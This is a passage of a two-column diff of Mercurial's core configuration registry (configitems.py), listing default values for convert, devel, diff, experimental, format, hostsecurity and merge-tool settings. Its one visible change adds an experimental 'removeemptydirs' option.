166 default='abort',
166 default='abort',
167 )
167 )
168 coreconfigitem('chgserver', 'idletimeout',
168 coreconfigitem('chgserver', 'idletimeout',
169 default=3600,
169 default=3600,
170 )
170 )
171 coreconfigitem('chgserver', 'skiphash',
171 coreconfigitem('chgserver', 'skiphash',
172 default=False,
172 default=False,
173 )
173 )
174 coreconfigitem('cmdserver', 'log',
174 coreconfigitem('cmdserver', 'log',
175 default=None,
175 default=None,
176 )
176 )
177 coreconfigitem('color', '.*',
177 coreconfigitem('color', '.*',
178 default=None,
178 default=None,
179 generic=True,
179 generic=True,
180 )
180 )
181 coreconfigitem('color', 'mode',
181 coreconfigitem('color', 'mode',
182 default='auto',
182 default='auto',
183 )
183 )
184 coreconfigitem('color', 'pagermode',
184 coreconfigitem('color', 'pagermode',
185 default=dynamicdefault,
185 default=dynamicdefault,
186 )
186 )
187 coreconfigitem('commands', 'show.aliasprefix',
187 coreconfigitem('commands', 'show.aliasprefix',
188 default=list,
188 default=list,
189 )
189 )
190 coreconfigitem('commands', 'status.relative',
190 coreconfigitem('commands', 'status.relative',
191 default=False,
191 default=False,
192 )
192 )
193 coreconfigitem('commands', 'status.skipstates',
193 coreconfigitem('commands', 'status.skipstates',
194 default=[],
194 default=[],
195 )
195 )
196 coreconfigitem('commands', 'status.terse',
196 coreconfigitem('commands', 'status.terse',
197 default='',
197 default='',
198 )
198 )
199 coreconfigitem('commands', 'status.verbose',
199 coreconfigitem('commands', 'status.verbose',
200 default=False,
200 default=False,
201 )
201 )
202 coreconfigitem('commands', 'update.check',
202 coreconfigitem('commands', 'update.check',
203 default=None,
203 default=None,
204 )
204 )
205 coreconfigitem('commands', 'update.requiredest',
205 coreconfigitem('commands', 'update.requiredest',
206 default=False,
206 default=False,
207 )
207 )
208 coreconfigitem('committemplate', '.*',
208 coreconfigitem('committemplate', '.*',
209 default=None,
209 default=None,
210 generic=True,
210 generic=True,
211 )
211 )
212 coreconfigitem('convert', 'cvsps.cache',
212 coreconfigitem('convert', 'cvsps.cache',
213 default=True,
213 default=True,
214 )
214 )
215 coreconfigitem('convert', 'cvsps.fuzz',
215 coreconfigitem('convert', 'cvsps.fuzz',
216 default=60,
216 default=60,
217 )
217 )
218 coreconfigitem('convert', 'cvsps.logencoding',
218 coreconfigitem('convert', 'cvsps.logencoding',
219 default=None,
219 default=None,
220 )
220 )
221 coreconfigitem('convert', 'cvsps.mergefrom',
221 coreconfigitem('convert', 'cvsps.mergefrom',
222 default=None,
222 default=None,
223 )
223 )
224 coreconfigitem('convert', 'cvsps.mergeto',
224 coreconfigitem('convert', 'cvsps.mergeto',
225 default=None,
225 default=None,
226 )
226 )
227 coreconfigitem('convert', 'git.committeractions',
227 coreconfigitem('convert', 'git.committeractions',
228 default=lambda: ['messagedifferent'],
228 default=lambda: ['messagedifferent'],
229 )
229 )
230 coreconfigitem('convert', 'git.extrakeys',
230 coreconfigitem('convert', 'git.extrakeys',
231 default=list,
231 default=list,
232 )
232 )
233 coreconfigitem('convert', 'git.findcopiesharder',
233 coreconfigitem('convert', 'git.findcopiesharder',
234 default=False,
234 default=False,
235 )
235 )
236 coreconfigitem('convert', 'git.remoteprefix',
236 coreconfigitem('convert', 'git.remoteprefix',
237 default='remote',
237 default='remote',
238 )
238 )
239 coreconfigitem('convert', 'git.renamelimit',
239 coreconfigitem('convert', 'git.renamelimit',
240 default=400,
240 default=400,
241 )
241 )
242 coreconfigitem('convert', 'git.saverev',
242 coreconfigitem('convert', 'git.saverev',
243 default=True,
243 default=True,
244 )
244 )
245 coreconfigitem('convert', 'git.similarity',
245 coreconfigitem('convert', 'git.similarity',
246 default=50,
246 default=50,
247 )
247 )
248 coreconfigitem('convert', 'git.skipsubmodules',
248 coreconfigitem('convert', 'git.skipsubmodules',
249 default=False,
249 default=False,
250 )
250 )
251 coreconfigitem('convert', 'hg.clonebranches',
251 coreconfigitem('convert', 'hg.clonebranches',
252 default=False,
252 default=False,
253 )
253 )
254 coreconfigitem('convert', 'hg.ignoreerrors',
254 coreconfigitem('convert', 'hg.ignoreerrors',
255 default=False,
255 default=False,
256 )
256 )
257 coreconfigitem('convert', 'hg.revs',
257 coreconfigitem('convert', 'hg.revs',
258 default=None,
258 default=None,
259 )
259 )
260 coreconfigitem('convert', 'hg.saverev',
260 coreconfigitem('convert', 'hg.saverev',
261 default=False,
261 default=False,
262 )
262 )
263 coreconfigitem('convert', 'hg.sourcename',
263 coreconfigitem('convert', 'hg.sourcename',
264 default=None,
264 default=None,
265 )
265 )
266 coreconfigitem('convert', 'hg.startrev',
266 coreconfigitem('convert', 'hg.startrev',
267 default=None,
267 default=None,
268 )
268 )
269 coreconfigitem('convert', 'hg.tagsbranch',
269 coreconfigitem('convert', 'hg.tagsbranch',
270 default='default',
270 default='default',
271 )
271 )
272 coreconfigitem('convert', 'hg.usebranchnames',
272 coreconfigitem('convert', 'hg.usebranchnames',
273 default=True,
273 default=True,
274 )
274 )
275 coreconfigitem('convert', 'ignoreancestorcheck',
275 coreconfigitem('convert', 'ignoreancestorcheck',
276 default=False,
276 default=False,
277 )
277 )
278 coreconfigitem('convert', 'localtimezone',
278 coreconfigitem('convert', 'localtimezone',
279 default=False,
279 default=False,
280 )
280 )
281 coreconfigitem('convert', 'p4.encoding',
281 coreconfigitem('convert', 'p4.encoding',
282 default=dynamicdefault,
282 default=dynamicdefault,
283 )
283 )
284 coreconfigitem('convert', 'p4.startrev',
284 coreconfigitem('convert', 'p4.startrev',
285 default=0,
285 default=0,
286 )
286 )
287 coreconfigitem('convert', 'skiptags',
287 coreconfigitem('convert', 'skiptags',
288 default=False,
288 default=False,
289 )
289 )
290 coreconfigitem('convert', 'svn.debugsvnlog',
290 coreconfigitem('convert', 'svn.debugsvnlog',
291 default=True,
291 default=True,
292 )
292 )
293 coreconfigitem('convert', 'svn.trunk',
293 coreconfigitem('convert', 'svn.trunk',
294 default=None,
294 default=None,
295 )
295 )
296 coreconfigitem('convert', 'svn.tags',
296 coreconfigitem('convert', 'svn.tags',
297 default=None,
297 default=None,
298 )
298 )
299 coreconfigitem('convert', 'svn.branches',
299 coreconfigitem('convert', 'svn.branches',
300 default=None,
300 default=None,
301 )
301 )
302 coreconfigitem('convert', 'svn.startrev',
302 coreconfigitem('convert', 'svn.startrev',
303 default=0,
303 default=0,
304 )
304 )
305 coreconfigitem('debug', 'dirstate.delaywrite',
305 coreconfigitem('debug', 'dirstate.delaywrite',
306 default=0,
306 default=0,
307 )
307 )
308 coreconfigitem('defaults', '.*',
308 coreconfigitem('defaults', '.*',
309 default=None,
309 default=None,
310 generic=True,
310 generic=True,
311 )
311 )
312 coreconfigitem('devel', 'all-warnings',
312 coreconfigitem('devel', 'all-warnings',
313 default=False,
313 default=False,
314 )
314 )
315 coreconfigitem('devel', 'bundle2.debug',
315 coreconfigitem('devel', 'bundle2.debug',
316 default=False,
316 default=False,
317 )
317 )
318 coreconfigitem('devel', 'cache-vfs',
318 coreconfigitem('devel', 'cache-vfs',
319 default=None,
319 default=None,
320 )
320 )
321 coreconfigitem('devel', 'check-locks',
321 coreconfigitem('devel', 'check-locks',
322 default=False,
322 default=False,
323 )
323 )
324 coreconfigitem('devel', 'check-relroot',
324 coreconfigitem('devel', 'check-relroot',
325 default=False,
325 default=False,
326 )
326 )
327 coreconfigitem('devel', 'default-date',
327 coreconfigitem('devel', 'default-date',
328 default=None,
328 default=None,
329 )
329 )
330 coreconfigitem('devel', 'deprec-warn',
330 coreconfigitem('devel', 'deprec-warn',
331 default=False,
331 default=False,
332 )
332 )
333 coreconfigitem('devel', 'disableloaddefaultcerts',
333 coreconfigitem('devel', 'disableloaddefaultcerts',
334 default=False,
334 default=False,
335 )
335 )
336 coreconfigitem('devel', 'warn-empty-changegroup',
336 coreconfigitem('devel', 'warn-empty-changegroup',
337 default=False,
337 default=False,
338 )
338 )
339 coreconfigitem('devel', 'legacy.exchange',
339 coreconfigitem('devel', 'legacy.exchange',
340 default=list,
340 default=list,
341 )
341 )
342 coreconfigitem('devel', 'servercafile',
342 coreconfigitem('devel', 'servercafile',
343 default='',
343 default='',
344 )
344 )
345 coreconfigitem('devel', 'serverexactprotocol',
345 coreconfigitem('devel', 'serverexactprotocol',
346 default='',
346 default='',
347 )
347 )
348 coreconfigitem('devel', 'serverrequirecert',
348 coreconfigitem('devel', 'serverrequirecert',
349 default=False,
349 default=False,
350 )
350 )
351 coreconfigitem('devel', 'strip-obsmarkers',
351 coreconfigitem('devel', 'strip-obsmarkers',
352 default=True,
352 default=True,
353 )
353 )
354 coreconfigitem('devel', 'warn-config',
354 coreconfigitem('devel', 'warn-config',
355 default=None,
355 default=None,
356 )
356 )
357 coreconfigitem('devel', 'warn-config-default',
357 coreconfigitem('devel', 'warn-config-default',
358 default=None,
358 default=None,
359 )
359 )
360 coreconfigitem('devel', 'user.obsmarker',
360 coreconfigitem('devel', 'user.obsmarker',
361 default=None,
361 default=None,
362 )
362 )
363 coreconfigitem('devel', 'warn-config-unknown',
363 coreconfigitem('devel', 'warn-config-unknown',
364 default=None,
364 default=None,
365 )
365 )
366 coreconfigitem('devel', 'debug.peer-request',
366 coreconfigitem('devel', 'debug.peer-request',
367 default=False,
367 default=False,
368 )
368 )
369 coreconfigitem('diff', 'nodates',
369 coreconfigitem('diff', 'nodates',
370 default=False,
370 default=False,
371 )
371 )
372 coreconfigitem('diff', 'showfunc',
372 coreconfigitem('diff', 'showfunc',
373 default=False,
373 default=False,
374 )
374 )
375 coreconfigitem('diff', 'unified',
375 coreconfigitem('diff', 'unified',
376 default=None,
376 default=None,
377 )
377 )
378 coreconfigitem('diff', 'git',
378 coreconfigitem('diff', 'git',
379 default=False,
379 default=False,
380 )
380 )
381 coreconfigitem('diff', 'ignorews',
381 coreconfigitem('diff', 'ignorews',
382 default=False,
382 default=False,
383 )
383 )
384 coreconfigitem('diff', 'ignorewsamount',
384 coreconfigitem('diff', 'ignorewsamount',
385 default=False,
385 default=False,
386 )
386 )
387 coreconfigitem('diff', 'ignoreblanklines',
387 coreconfigitem('diff', 'ignoreblanklines',
388 default=False,
388 default=False,
389 )
389 )
390 coreconfigitem('diff', 'ignorewseol',
390 coreconfigitem('diff', 'ignorewseol',
391 default=False,
391 default=False,
392 )
392 )
393 coreconfigitem('diff', 'nobinary',
393 coreconfigitem('diff', 'nobinary',
394 default=False,
394 default=False,
395 )
395 )
396 coreconfigitem('diff', 'noprefix',
396 coreconfigitem('diff', 'noprefix',
397 default=False,
397 default=False,
398 )
398 )
399 coreconfigitem('email', 'bcc',
399 coreconfigitem('email', 'bcc',
400 default=None,
400 default=None,
401 )
401 )
402 coreconfigitem('email', 'cc',
402 coreconfigitem('email', 'cc',
403 default=None,
403 default=None,
404 )
404 )
405 coreconfigitem('email', 'charsets',
405 coreconfigitem('email', 'charsets',
406 default=list,
406 default=list,
407 )
407 )
408 coreconfigitem('email', 'from',
408 coreconfigitem('email', 'from',
409 default=None,
409 default=None,
410 )
410 )
411 coreconfigitem('email', 'method',
411 coreconfigitem('email', 'method',
412 default='smtp',
412 default='smtp',
413 )
413 )
414 coreconfigitem('email', 'reply-to',
414 coreconfigitem('email', 'reply-to',
415 default=None,
415 default=None,
416 )
416 )
417 coreconfigitem('email', 'to',
417 coreconfigitem('email', 'to',
418 default=None,
418 default=None,
419 )
419 )
420 coreconfigitem('experimental', 'archivemetatemplate',
420 coreconfigitem('experimental', 'archivemetatemplate',
421 default=dynamicdefault,
421 default=dynamicdefault,
422 )
422 )
423 coreconfigitem('experimental', 'bundle-phases',
423 coreconfigitem('experimental', 'bundle-phases',
424 default=False,
424 default=False,
425 )
425 )
426 coreconfigitem('experimental', 'bundle2-advertise',
426 coreconfigitem('experimental', 'bundle2-advertise',
427 default=True,
427 default=True,
428 )
428 )
429 coreconfigitem('experimental', 'bundle2-output-capture',
429 coreconfigitem('experimental', 'bundle2-output-capture',
430 default=False,
430 default=False,
431 )
431 )
432 coreconfigitem('experimental', 'bundle2.pushback',
432 coreconfigitem('experimental', 'bundle2.pushback',
433 default=False,
433 default=False,
434 )
434 )
435 coreconfigitem('experimental', 'bundle2.stream',
435 coreconfigitem('experimental', 'bundle2.stream',
436 default=False,
436 default=False,
437 )
437 )
438 coreconfigitem('experimental', 'bundle2lazylocking',
438 coreconfigitem('experimental', 'bundle2lazylocking',
439 default=False,
439 default=False,
440 )
440 )
441 coreconfigitem('experimental', 'bundlecomplevel',
441 coreconfigitem('experimental', 'bundlecomplevel',
442 default=None,
442 default=None,
443 )
443 )
444 coreconfigitem('experimental', 'bundlecomplevel.bzip2',
444 coreconfigitem('experimental', 'bundlecomplevel.bzip2',
445 default=None,
445 default=None,
446 )
446 )
447 coreconfigitem('experimental', 'bundlecomplevel.gzip',
447 coreconfigitem('experimental', 'bundlecomplevel.gzip',
448 default=None,
448 default=None,
449 )
449 )
450 coreconfigitem('experimental', 'bundlecomplevel.none',
450 coreconfigitem('experimental', 'bundlecomplevel.none',
451 default=None,
451 default=None,
452 )
452 )
453 coreconfigitem('experimental', 'bundlecomplevel.zstd',
453 coreconfigitem('experimental', 'bundlecomplevel.zstd',
454 default=None,
454 default=None,
455 )
455 )
456 coreconfigitem('experimental', 'changegroup3',
456 coreconfigitem('experimental', 'changegroup3',
457 default=False,
457 default=False,
458 )
458 )
459 coreconfigitem('experimental', 'clientcompressionengines',
459 coreconfigitem('experimental', 'clientcompressionengines',
460 default=list,
460 default=list,
461 )
461 )
462 coreconfigitem('experimental', 'copytrace',
462 coreconfigitem('experimental', 'copytrace',
463 default='on',
463 default='on',
464 )
464 )
465 coreconfigitem('experimental', 'copytrace.movecandidateslimit',
465 coreconfigitem('experimental', 'copytrace.movecandidateslimit',
466 default=100,
466 default=100,
467 )
467 )
468 coreconfigitem('experimental', 'copytrace.sourcecommitlimit',
468 coreconfigitem('experimental', 'copytrace.sourcecommitlimit',
469 default=100,
469 default=100,
470 )
470 )
471 coreconfigitem('experimental', 'crecordtest',
471 coreconfigitem('experimental', 'crecordtest',
472 default=None,
472 default=None,
473 )
473 )
474 coreconfigitem('experimental', 'directaccess',
474 coreconfigitem('experimental', 'directaccess',
475 default=False,
475 default=False,
476 )
476 )
477 coreconfigitem('experimental', 'directaccess.revnums',
477 coreconfigitem('experimental', 'directaccess.revnums',
478 default=False,
478 default=False,
479 )
479 )
480 coreconfigitem('experimental', 'editortmpinhg',
480 coreconfigitem('experimental', 'editortmpinhg',
481 default=False,
481 default=False,
482 )
482 )
483 coreconfigitem('experimental', 'evolution',
483 coreconfigitem('experimental', 'evolution',
484 default=list,
484 default=list,
485 )
485 )
486 coreconfigitem('experimental', 'evolution.allowdivergence',
486 coreconfigitem('experimental', 'evolution.allowdivergence',
487 default=False,
487 default=False,
488 alias=[('experimental', 'allowdivergence')]
488 alias=[('experimental', 'allowdivergence')]
489 )
489 )
490 coreconfigitem('experimental', 'evolution.allowunstable',
490 coreconfigitem('experimental', 'evolution.allowunstable',
491 default=None,
491 default=None,
492 )
492 )
493 coreconfigitem('experimental', 'evolution.createmarkers',
493 coreconfigitem('experimental', 'evolution.createmarkers',
494 default=None,
494 default=None,
495 )
495 )
496 coreconfigitem('experimental', 'evolution.effect-flags',
496 coreconfigitem('experimental', 'evolution.effect-flags',
497 default=True,
497 default=True,
498 alias=[('experimental', 'effect-flags')]
498 alias=[('experimental', 'effect-flags')]
499 )
499 )
500 coreconfigitem('experimental', 'evolution.exchange',
500 coreconfigitem('experimental', 'evolution.exchange',
501 default=None,
501 default=None,
502 )
502 )
503 coreconfigitem('experimental', 'evolution.bundle-obsmarker',
503 coreconfigitem('experimental', 'evolution.bundle-obsmarker',
504 default=False,
504 default=False,
505 )
505 )
506 coreconfigitem('experimental', 'evolution.report-instabilities',
506 coreconfigitem('experimental', 'evolution.report-instabilities',
507 default=True,
507 default=True,
508 )
508 )
509 coreconfigitem('experimental', 'evolution.track-operation',
509 coreconfigitem('experimental', 'evolution.track-operation',
510 default=True,
510 default=True,
511 )
511 )
512 coreconfigitem('experimental', 'worddiff',
512 coreconfigitem('experimental', 'worddiff',
513 default=False,
513 default=False,
514 )
514 )
515 coreconfigitem('experimental', 'maxdeltachainspan',
515 coreconfigitem('experimental', 'maxdeltachainspan',
516 default=-1,
516 default=-1,
517 )
517 )
518 coreconfigitem('experimental', 'mergetempdirprefix',
518 coreconfigitem('experimental', 'mergetempdirprefix',
519 default=None,
519 default=None,
520 )
520 )
521 coreconfigitem('experimental', 'mmapindexthreshold',
521 coreconfigitem('experimental', 'mmapindexthreshold',
522 default=None,
522 default=None,
523 )
523 )
524 coreconfigitem('experimental', 'nonnormalparanoidcheck',
524 coreconfigitem('experimental', 'nonnormalparanoidcheck',
525 default=False,
525 default=False,
526 )
526 )
527 coreconfigitem('experimental', 'exportableenviron',
527 coreconfigitem('experimental', 'exportableenviron',
528 default=list,
528 default=list,
529 )
529 )
530 coreconfigitem('experimental', 'extendedheader.index',
530 coreconfigitem('experimental', 'extendedheader.index',
531 default=None,
531 default=None,
532 )
532 )
533 coreconfigitem('experimental', 'extendedheader.similarity',
533 coreconfigitem('experimental', 'extendedheader.similarity',
534 default=False,
534 default=False,
535 )
535 )
536 coreconfigitem('experimental', 'format.compression',
536 coreconfigitem('experimental', 'format.compression',
537 default='zlib',
537 default='zlib',
538 )
538 )
539 coreconfigitem('experimental', 'graphshorten',
539 coreconfigitem('experimental', 'graphshorten',
540 default=False,
540 default=False,
541 )
541 )
542 coreconfigitem('experimental', 'graphstyle.parent',
542 coreconfigitem('experimental', 'graphstyle.parent',
543 default=dynamicdefault,
543 default=dynamicdefault,
544 )
544 )
545 coreconfigitem('experimental', 'graphstyle.missing',
545 coreconfigitem('experimental', 'graphstyle.missing',
546 default=dynamicdefault,
546 default=dynamicdefault,
547 )
547 )
548 coreconfigitem('experimental', 'graphstyle.grandparent',
548 coreconfigitem('experimental', 'graphstyle.grandparent',
549 default=dynamicdefault,
549 default=dynamicdefault,
550 )
550 )
551 coreconfigitem('experimental', 'hook-track-tags',
551 coreconfigitem('experimental', 'hook-track-tags',
552 default=False,
552 default=False,
553 )
553 )
554 coreconfigitem('experimental', 'httppeer.advertise-v2',
554 coreconfigitem('experimental', 'httppeer.advertise-v2',
555 default=False,
555 default=False,
556 )
556 )
557 coreconfigitem('experimental', 'httppostargs',
557 coreconfigitem('experimental', 'httppostargs',
558 default=False,
558 default=False,
559 )
559 )
560 coreconfigitem('experimental', 'mergedriver',
560 coreconfigitem('experimental', 'mergedriver',
561 default=None,
561 default=None,
562 )
562 )
563 coreconfigitem('experimental', 'obsmarkers-exchange-debug',
563 coreconfigitem('experimental', 'obsmarkers-exchange-debug',
564 default=False,
564 default=False,
565 )
565 )
566 coreconfigitem('experimental', 'remotenames',
566 coreconfigitem('experimental', 'remotenames',
567 default=False,
567 default=False,
568 )
568 )
569 coreconfigitem('experimental', 'removeemptydirs',
570 default=True,
571 )
569 coreconfigitem('experimental', 'revlogv2',
572 coreconfigitem('experimental', 'revlogv2',
570 default=None,
573 default=None,
571 )
574 )
572 coreconfigitem('experimental', 'single-head-per-branch',
575 coreconfigitem('experimental', 'single-head-per-branch',
573 default=False,
576 default=False,
574 )
577 )
575 coreconfigitem('experimental', 'sshserver.support-v2',
578 coreconfigitem('experimental', 'sshserver.support-v2',
576 default=False,
579 default=False,
577 )
580 )
578 coreconfigitem('experimental', 'spacemovesdown',
581 coreconfigitem('experimental', 'spacemovesdown',
579 default=False,
582 default=False,
580 )
583 )
581 coreconfigitem('experimental', 'sparse-read',
584 coreconfigitem('experimental', 'sparse-read',
582 default=False,
585 default=False,
583 )
586 )
584 coreconfigitem('experimental', 'sparse-read.density-threshold',
587 coreconfigitem('experimental', 'sparse-read.density-threshold',
585 default=0.25,
588 default=0.25,
586 )
589 )
587 coreconfigitem('experimental', 'sparse-read.min-gap-size',
590 coreconfigitem('experimental', 'sparse-read.min-gap-size',
588 default='256K',
591 default='256K',
589 )
592 )
590 coreconfigitem('experimental', 'treemanifest',
593 coreconfigitem('experimental', 'treemanifest',
591 default=False,
594 default=False,
592 )
595 )
593 coreconfigitem('experimental', 'update.atomic-file',
596 coreconfigitem('experimental', 'update.atomic-file',
594 default=False,
597 default=False,
595 )
598 )
596 coreconfigitem('experimental', 'sshpeer.advertise-v2',
599 coreconfigitem('experimental', 'sshpeer.advertise-v2',
597 default=False,
600 default=False,
598 )
601 )
599 coreconfigitem('experimental', 'web.apiserver',
602 coreconfigitem('experimental', 'web.apiserver',
600 default=False,
603 default=False,
601 )
604 )
602 coreconfigitem('experimental', 'web.api.http-v2',
605 coreconfigitem('experimental', 'web.api.http-v2',
603 default=False,
606 default=False,
604 )
607 )
605 coreconfigitem('experimental', 'web.api.debugreflect',
608 coreconfigitem('experimental', 'web.api.debugreflect',
606 default=False,
609 default=False,
607 )
610 )
608 coreconfigitem('experimental', 'xdiff',
611 coreconfigitem('experimental', 'xdiff',
609 default=False,
612 default=False,
610 )
613 )
611 coreconfigitem('extensions', '.*',
614 coreconfigitem('extensions', '.*',
612 default=None,
615 default=None,
613 generic=True,
616 generic=True,
614 )
617 )
615 coreconfigitem('extdata', '.*',
618 coreconfigitem('extdata', '.*',
616 default=None,
619 default=None,
617 generic=True,
620 generic=True,
618 )
621 )
619 coreconfigitem('format', 'aggressivemergedeltas',
622 coreconfigitem('format', 'aggressivemergedeltas',
620 default=False,
623 default=False,
621 )
624 )
622 coreconfigitem('format', 'chunkcachesize',
625 coreconfigitem('format', 'chunkcachesize',
623 default=None,
626 default=None,
624 )
627 )
625 coreconfigitem('format', 'dotencode',
628 coreconfigitem('format', 'dotencode',
626 default=True,
629 default=True,
627 )
630 )
628 coreconfigitem('format', 'generaldelta',
631 coreconfigitem('format', 'generaldelta',
629 default=False,
632 default=False,
630 )
633 )
631 coreconfigitem('format', 'manifestcachesize',
634 coreconfigitem('format', 'manifestcachesize',
632 default=None,
635 default=None,
633 )
636 )
634 coreconfigitem('format', 'maxchainlen',
637 coreconfigitem('format', 'maxchainlen',
635 default=None,
638 default=None,
636 )
639 )
637 coreconfigitem('format', 'obsstore-version',
640 coreconfigitem('format', 'obsstore-version',
638 default=None,
641 default=None,
639 )
642 )
640 coreconfigitem('format', 'usefncache',
643 coreconfigitem('format', 'usefncache',
641 default=True,
644 default=True,
642 )
645 )
643 coreconfigitem('format', 'usegeneraldelta',
646 coreconfigitem('format', 'usegeneraldelta',
644 default=True,
647 default=True,
645 )
648 )
646 coreconfigitem('format', 'usestore',
649 coreconfigitem('format', 'usestore',
647 default=True,
650 default=True,
648 )
651 )
649 coreconfigitem('fsmonitor', 'warn_when_unused',
652 coreconfigitem('fsmonitor', 'warn_when_unused',
650 default=True,
653 default=True,
651 )
654 )
652 coreconfigitem('fsmonitor', 'warn_update_file_count',
655 coreconfigitem('fsmonitor', 'warn_update_file_count',
653 default=50000,
656 default=50000,
654 )
657 )
655 coreconfigitem('hooks', '.*',
658 coreconfigitem('hooks', '.*',
656 default=dynamicdefault,
659 default=dynamicdefault,
657 generic=True,
660 generic=True,
658 )
661 )
659 coreconfigitem('hgweb-paths', '.*',
662 coreconfigitem('hgweb-paths', '.*',
660 default=list,
663 default=list,
661 generic=True,
664 generic=True,
662 )
665 )
663 coreconfigitem('hostfingerprints', '.*',
666 coreconfigitem('hostfingerprints', '.*',
664 default=list,
667 default=list,
665 generic=True,
668 generic=True,
666 )
669 )
667 coreconfigitem('hostsecurity', 'ciphers',
670 coreconfigitem('hostsecurity', 'ciphers',
668 default=None,
671 default=None,
669 )
672 )
670 coreconfigitem('hostsecurity', 'disabletls10warning',
673 coreconfigitem('hostsecurity', 'disabletls10warning',
671 default=False,
674 default=False,
672 )
675 )
673 coreconfigitem('hostsecurity', 'minimumprotocol',
676 coreconfigitem('hostsecurity', 'minimumprotocol',
674 default=dynamicdefault,
677 default=dynamicdefault,
675 )
678 )
676 coreconfigitem('hostsecurity', '.*:minimumprotocol$',
679 coreconfigitem('hostsecurity', '.*:minimumprotocol$',
677 default=dynamicdefault,
680 default=dynamicdefault,
678 generic=True,
681 generic=True,
679 )
682 )
680 coreconfigitem('hostsecurity', '.*:ciphers$',
683 coreconfigitem('hostsecurity', '.*:ciphers$',
681 default=dynamicdefault,
684 default=dynamicdefault,
682 generic=True,
685 generic=True,
683 )
686 )
684 coreconfigitem('hostsecurity', '.*:fingerprints$',
687 coreconfigitem('hostsecurity', '.*:fingerprints$',
685 default=list,
688 default=list,
686 generic=True,
689 generic=True,
687 )
690 )
688 coreconfigitem('hostsecurity', '.*:verifycertsfile$',
691 coreconfigitem('hostsecurity', '.*:verifycertsfile$',
689 default=None,
692 default=None,
690 generic=True,
693 generic=True,
691 )
694 )
692
695
693 coreconfigitem('http_proxy', 'always',
696 coreconfigitem('http_proxy', 'always',
694 default=False,
697 default=False,
695 )
698 )
696 coreconfigitem('http_proxy', 'host',
699 coreconfigitem('http_proxy', 'host',
697 default=None,
700 default=None,
698 )
701 )
699 coreconfigitem('http_proxy', 'no',
702 coreconfigitem('http_proxy', 'no',
700 default=list,
703 default=list,
701 )
704 )
702 coreconfigitem('http_proxy', 'passwd',
705 coreconfigitem('http_proxy', 'passwd',
703 default=None,
706 default=None,
704 )
707 )
705 coreconfigitem('http_proxy', 'user',
708 coreconfigitem('http_proxy', 'user',
706 default=None,
709 default=None,
707 )
710 )
708 coreconfigitem('logtoprocess', 'commandexception',
711 coreconfigitem('logtoprocess', 'commandexception',
709 default=None,
712 default=None,
710 )
713 )
711 coreconfigitem('logtoprocess', 'commandfinish',
714 coreconfigitem('logtoprocess', 'commandfinish',
712 default=None,
715 default=None,
713 )
716 )
714 coreconfigitem('logtoprocess', 'command',
717 coreconfigitem('logtoprocess', 'command',
715 default=None,
718 default=None,
716 )
719 )
717 coreconfigitem('logtoprocess', 'develwarn',
720 coreconfigitem('logtoprocess', 'develwarn',
718 default=None,
721 default=None,
719 )
722 )
720 coreconfigitem('logtoprocess', 'uiblocked',
723 coreconfigitem('logtoprocess', 'uiblocked',
721 default=None,
724 default=None,
722 )
725 )
723 coreconfigitem('merge', 'checkunknown',
726 coreconfigitem('merge', 'checkunknown',
724 default='abort',
727 default='abort',
725 )
728 )
726 coreconfigitem('merge', 'checkignored',
729 coreconfigitem('merge', 'checkignored',
727 default='abort',
730 default='abort',
728 )
731 )
729 coreconfigitem('experimental', 'merge.checkpathconflicts',
732 coreconfigitem('experimental', 'merge.checkpathconflicts',
730 default=False,
733 default=False,
731 )
734 )
732 coreconfigitem('merge', 'followcopies',
735 coreconfigitem('merge', 'followcopies',
733 default=True,
736 default=True,
734 )
737 )
735 coreconfigitem('merge', 'on-failure',
738 coreconfigitem('merge', 'on-failure',
736 default='continue',
739 default='continue',
737 )
740 )
738 coreconfigitem('merge', 'preferancestor',
741 coreconfigitem('merge', 'preferancestor',
739 default=lambda: ['*'],
742 default=lambda: ['*'],
740 )
743 )
741 coreconfigitem('merge-tools', '.*',
744 coreconfigitem('merge-tools', '.*',
742 default=None,
745 default=None,
743 generic=True,
746 generic=True,
744 )
747 )
745 coreconfigitem('merge-tools', br'.*\.args$',
748 coreconfigitem('merge-tools', br'.*\.args$',
746 default="$local $base $other",
749 default="$local $base $other",
747 generic=True,
750 generic=True,
748 priority=-1,
751 priority=-1,
749 )
752 )
750 coreconfigitem('merge-tools', br'.*\.binary$',
753 coreconfigitem('merge-tools', br'.*\.binary$',
751 default=False,
754 default=False,
752 generic=True,
755 generic=True,
753 priority=-1,
756 priority=-1,
754 )
757 )
755 coreconfigitem('merge-tools', br'.*\.check$',
758 coreconfigitem('merge-tools', br'.*\.check$',
756 default=list,
759 default=list,
757 generic=True,
760 generic=True,
758 priority=-1,
761 priority=-1,
759 )
762 )
760 coreconfigitem('merge-tools', br'.*\.checkchanged$',
763 coreconfigitem('merge-tools', br'.*\.checkchanged$',
761 default=False,
764 default=False,
762 generic=True,
765 generic=True,
763 priority=-1,
766 priority=-1,
764 )
767 )
765 coreconfigitem('merge-tools', br'.*\.executable$',
768 coreconfigitem('merge-tools', br'.*\.executable$',
766 default=dynamicdefault,
769 default=dynamicdefault,
767 generic=True,
770 generic=True,
768 priority=-1,
771 priority=-1,
769 )
772 )
770 coreconfigitem('merge-tools', br'.*\.fixeol$',
773 coreconfigitem('merge-tools', br'.*\.fixeol$',
771 default=False,
774 default=False,
772 generic=True,
775 generic=True,
773 priority=-1,
776 priority=-1,
774 )
777 )
775 coreconfigitem('merge-tools', br'.*\.gui$',
778 coreconfigitem('merge-tools', br'.*\.gui$',
776 default=False,
779 default=False,
777 generic=True,
780 generic=True,
778 priority=-1,
781 priority=-1,
779 )
782 )
780 coreconfigitem('merge-tools', br'.*\.mergemarkers$',
783 coreconfigitem('merge-tools', br'.*\.mergemarkers$',
781 default='basic',
784 default='basic',
782 generic=True,
785 generic=True,
783 priority=-1,
786 priority=-1,
784 )
787 )
785 coreconfigitem('merge-tools', br'.*\.mergemarkertemplate$',
788 coreconfigitem('merge-tools', br'.*\.mergemarkertemplate$',
786 default=dynamicdefault, # take from ui.mergemarkertemplate
789 default=dynamicdefault, # take from ui.mergemarkertemplate
787 generic=True,
790 generic=True,
788 priority=-1,
791 priority=-1,
789 )
792 )
790 coreconfigitem('merge-tools', br'.*\.priority$',
793 coreconfigitem('merge-tools', br'.*\.priority$',
791 default=0,
794 default=0,
792 generic=True,
795 generic=True,
793 priority=-1,
796 priority=-1,
794 )
797 )
795 coreconfigitem('merge-tools', br'.*\.premerge$',
798 coreconfigitem('merge-tools', br'.*\.premerge$',
796 default=dynamicdefault,
799 default=dynamicdefault,
797 generic=True,
800 generic=True,
798 priority=-1,
801 priority=-1,
799 )
802 )
800 coreconfigitem('merge-tools', br'.*\.symlink$',
